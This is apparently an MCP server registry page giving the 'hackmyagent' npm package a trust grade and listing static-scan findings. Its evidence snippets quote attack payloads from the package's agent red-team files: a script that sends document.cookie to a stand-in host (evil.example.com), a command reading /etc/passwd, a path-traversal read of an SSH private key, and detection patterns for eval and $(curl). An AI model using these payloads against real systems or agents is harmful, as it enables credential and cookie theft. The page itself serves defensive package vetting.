Hackmyagent MCP Server

hackmyagent npm v0.25.0 Source verified

Published by opena2a-org — publish provenance cryptographically ties this package to that repository. That is proof of origin, not an official vendor package.

Trust grade
A
94/100
Last scanned get badge →
Trust
A · 94/100
Adoption risk for you: the threat score, then adjusted down for blast radius, publisher verification and how much the scan could see. Deterministic; every point is auditable.
Capability
High
Blast radius if it went rogue — what the server’s tools could reach. Independent of trust.
Coverage
Source
How much the scan could actually inspect. Shallow coverage is stated, never hidden.
Share this Trust Score
𝕏 Share LinkedIn Reddit
A Why this grade threat 100 − adoption risk = 94/100

The grade answers one question — how safe is this server for you to adopt — so it is computed in two auditable stages. Nothing below is an opinion or an LLM's guess; every line is a real term the deterministic engine applied, and the same input always yields the same number.

1. Threat score — 100 − 0 = 100. What the published surface and source actually contain:

The deterministic scan raised no scored threat in the surface it inspected — the threat score stayed at 100. Capability observations and advisory notes are recorded but never lower it.

2. Client adoption risk — 100 − 6 = 94. Three small, subtract-only factors that reflect your risk in adopting it — a clean scan proves less on a powerful, unverified or barely-inspectable package, so the grade says so plainly:

PointsAdoption-risk factor
−6 capability blast radius (high) — client exposure if the model is manipulated

Capability observations and info notes are shown under Findings but never scored. Open any row's finding below for the file, line and evidence behind a deduction.

Findings 24

high Reads a sensitive credential path or dumps the environment (dist/attack/payloads/mcp-exploitation.js)MTC-SRC-006

In the server's implementation (`dist/attack/payloads/mcp-exploitation.js:61`): Reading private keys / cloud credentials, or serializing the whole environment, is a sensitive-data source that becomes exfiltration when combined with any egress. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ../../../home/user/.ssh/id_rsa"}', successIndicators: [ /BEGIN (RSA |OPENSSH )?PRIVATE KEY/i,

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/attack/payloads/mcp-exploitation.js

high Reads a sensitive credential path or dumps the environment (dist/nanomind-core/fix-generator.js)MTC-SRC-006

In the server's implementation (`dist/nanomind-core/fix-generator.js:607`): Reading private keys / cloud credentials, or serializing the whole environment, is a sensitive-data source that becomes exfiltration when combined with any egress. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: t.config.json', '.npmrc.json', '.nvmrc.json', ]); return repoConfigBasenames.has(basename); } fu

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/nanomind-core/fix-generator.js

high Reads a sensitive credential path or dumps the environment (dist/nanomind-core/scanner-bridge.js)MTC-SRC-006

In the server's implementation (`dist/nanomind-core/scanner-bridge.js:182`): Reading private keys / cloud credentials, or serializing the whole environment, is a sensitive-data source that becomes exfiltration when combined with any egress. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: g.json' || fileName === '.npmrc') { continue; } // Select analyzers based on art

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/nanomind-core/scanner-bridge.js

high Dynamic evaluation of a non-literal value (dist/hardening/scanner.js)MTC-SRC-010

In the server's implementation (`dist/hardening/scanner.js:3224`): Evaluating a runtime value as code (rather than a fixed literal) executes whatever reaches it — a direct RCE primitive, and almost never necessary in legitimate code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: /\beval\s*\(/, // eval( /\$\(curl\b/, // $(curl /\$\(wget\b/, // $(wget ];

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/hardening/scanner.js

high Dynamic code execution in server code (dist/hardening/scanner.js)MTC-SRC-001

In the server's implementation (`dist/hardening/scanner.js:3224`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: /\beval\s*\(/, // eval( /\$\(curl\b/, // $(curl /\$\(wget\b/, // $(wget ];

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/hardening/scanner.js

high Dynamic code execution in server code (dist/nanomind-core/analyzers/code-analyzer.js)MTC-SRC-001

In the server's implementation (`dist/nanomind-core/analyzers/code-analyzer.js:170`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: fix: 'Remove eval(), new Function(), and similar dynamic code execution: ' + '1. Replace eval

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/nanomind-core/analyzers/code-analyzer.js

high Dynamic code execution in server code (dist/nanomind-core/fix-generator.js)MTC-SRC-001

In the server's implementation (`dist/nanomind-core/fix-generator.js:323`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: xecution via curl|sh or eval() gives an attacker who controls the URL full system access.`); } else { pa

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/nanomind-core/fix-generator.js

high Shell/command execution in server code (dist/attack/payloads/parser-differential.js)MTC-SRC-002

In the server's implementation (`dist/attack/payloads/parser-differential.js:60`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: e safe code\nimport os; os.system("cat /etc/passwd")\n```', successIndicators: [ /script.*executed|r

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/attack/payloads/parser-differential.js

high Shell/command execution in server code (dist/cli.js)MTC-SRC-002

In the server's implementation (`dist/cli.js:2802`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: { execSync } = require('child_process'); const url = execSync('git remote get-url origin', { cwd: ta

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/cli.js

high Shell/command execution in server code (dist/eval/oracle.js)MTC-SRC-002

In the server's implementation (`dist/eval/oracle.js:52`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: rintOracleReport; const child_process_1 = require("child_process"); const fs = __importStar(require("fs")); const path =

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/eval/oracle.js

high Shell/command execution in server code (dist/hardening/nemoclaw-scanner.js)MTC-SRC-002

In the server's implementation (`dist/hardening/nemoclaw-scanner.js:45`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: EGORIES = void 0; const child_process_1 = require("child_process"); const fs_1 = require("fs"); const path = __importSta

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/hardening/nemoclaw-scanner.js

high Shell/command execution in server code (dist/hardening/scanner.js)MTC-SRC-002

In the server's implementation (`dist/hardening/scanner.js:53`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: require("path")); const child_process_1 = require("child_process"); const semantic_1 = require("../semantic"); const tax

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/hardening/scanner.js

high Shell/command execution in server code (dist/nanomind-core/analyzers/code-analyzer.js)MTC-SRC-002

In the server's implementation (`dist/nanomind-core/analyzers/code-analyzer.js:75`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: 'Functions like exec(), spawn(), execSync(), or child_process are called ' + 'with data that

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/nanomind-core/analyzers/code-analyzer.js

high Shell/command execution in server code (dist/nanomind-core/daemon-lifecycle.js)MTC-SRC-002

In the server's implementation (`dist/nanomind-core/daemon-lifecycle.js:17`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: nsureDaemon; const node_child_process_1 = require("node:child_process"); const node_fs_1 = require("node:fs"); const nod

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/nanomind-core/daemon-lifecycle.js

high Shell/command execution in server code (dist/nanomind-core/inference/security-analyst.js)MTC-SRC-002

In the server's implementation (`dist/nanomind-core/inference/security-analyst.js:41`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: IntelReport; const node_child_process_1 = require("node:child_process"); const node_fs_1 = require("node:fs"); const nod

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/nanomind-core/inference/security-analyst.js

high Shell/command execution in server code (dist/narrative/mcp-narrative.js)MTC-SRC-002

In the server's implementation (`dist/narrative/mcp-narrative.js:133`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: e) { if (/spawn|child_process|exec\(/i.test(risk.evidence ?? "")) { effects.add("spawns child proces

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/narrative/mcp-narrative.js

high Shell/command execution in server code (dist/oasb/harness/dvaa-manager.js)MTC-SRC-002

In the server's implementation (`dist/oasb/harness/dvaa-manager.js:40`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: Manager = void 0; const child_process_1 = require("child_process"); const path = __importStar(require("path")); const ht

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/oasb/harness/dvaa-manager.js

medium Hardcoded egress to an external endpoint (dist/attack/payloads/parser-differential.js)MTC-SRC-003

In the server's implementation (`dist/attack/payloads/parser-differential.js:60`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: e block\n```\n\n<script>fetch("https://evil.example.com/exfil?data="+document.cookie)</script>\n\n```python\n# This look

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/attack/payloads/parser-differential.js

medium Hardcoded egress to an external endpoint (dist/cli.js)MTC-SRC-003

In the server's implementation (`dist/cli.js:8552`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: const metaRes = await fetch(`https://pypi.org/pypi/${encodeURIComponent(name)}/json`); if (!metaRes.ok) {

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/cli.js

medium Hardcoded egress to an external endpoint (dist/simulation/llm-executor.js)MTC-SRC-003

In the server's implementation (`dist/simulation/llm-executor.js:65`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: const resp = await fetch('https://api.anthropic.com/v1/messages', { method: 'POST', headers

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/simulation/llm-executor.js

medium Hardcoded egress to an external endpoint (dist/soul/scanner.js)MTC-SRC-003

In the server's implementation (`dist/soul/scanner.js:1442`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: const response = await fetch('https://api.anthropic.com/v1/messages', { method: 'POST',

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/soul/scanner.js

medium Dynamic module load from a non-literal (dist/cli.js)MTC-SRC-005

In the server's implementation (`dist/cli.js:3725`): Loading a module chosen at runtime (from a variable) can pull in and run attacker-influenced code paths. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: scannerVersion = require(hmaPackagePath).version || 'unknown'; } catch {

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/cli.js

medium Dynamic module load from a non-literal (dist/plugins/secretless.js)MTC-SRC-005

In the server's implementation (`dist/plugins/secretless.js:16`): Loading a module chosen at runtime (from a variable) can pull in and run attacker-influenced code paths. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: rts const mod = require(moduleName); _secretlessApi = { init: mod.init, scan: mo

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/plugins/secretless.js

medium Dynamic module load from a non-literal (dist/registry/publish.js)MTC-SRC-005

In the server's implementation (`dist/registry/publish.js:304`): Loading a module chosen at runtime (from a variable) can pull in and run attacker-influenced code paths. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ; toolVersion = require(pkgPath).version; } catch { // Fallback version } const payload

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/registry/publish.js

Tools 4

Each tool and what it can reach — statically extracted from the published source.

  • hackmyagent_analyze_fileno sensitive capability
  • hackmyagent_benchmarkno sensitive capability
  • hackmyagent_deep_scanno sensitive capability
  • hackmyagent_scanno sensitive capability

What this scan could not see

Versions 1

Scan history per published version. The engine is deterministic — the same version always yields the same score, so a changed score means the package itself changed.

VersionScoreFindingsEngineScanned
v0.25.0 latest A 94/100 24 1.10.0 2026-07-25

Embed this score

Show this server's live Trust Score in your README, docs or website. The badge is served straight from the registry and updates automatically after every rescan — no API key needed. It links back to this page, so anyone who sees the grade can also read the findings behind it instead of taking a number on faith.

MCP Trust Score: A · 94/100
Markdown (GitHub README)
[![MCP Trust Score](https://mcptrustchecker.com/registry/hackmyagent/badge.svg)](https://mcptrustchecker.com/registry/hackmyagent)
HTML
<a href="https://mcptrustchecker.com/registry/hackmyagent"><img src="https://mcptrustchecker.com/registry/hackmyagent/badge.svg" alt="MCP Trust Score" height="20"></a>
Prefer shields.io styling? Point it at https://mcptrustchecker.com/registry/hackmyagent/badge.json via https://img.shields.io/endpoint?url=…

Verify this score yourself

The score above is reproducible: the same package version always yields the same result. Run it locally or over the free API — no account, no LLM, fully deterministic.

npx mcptrustchecker scan hackmyagent --online

Use the free API → How scoring works

More in Developer Tools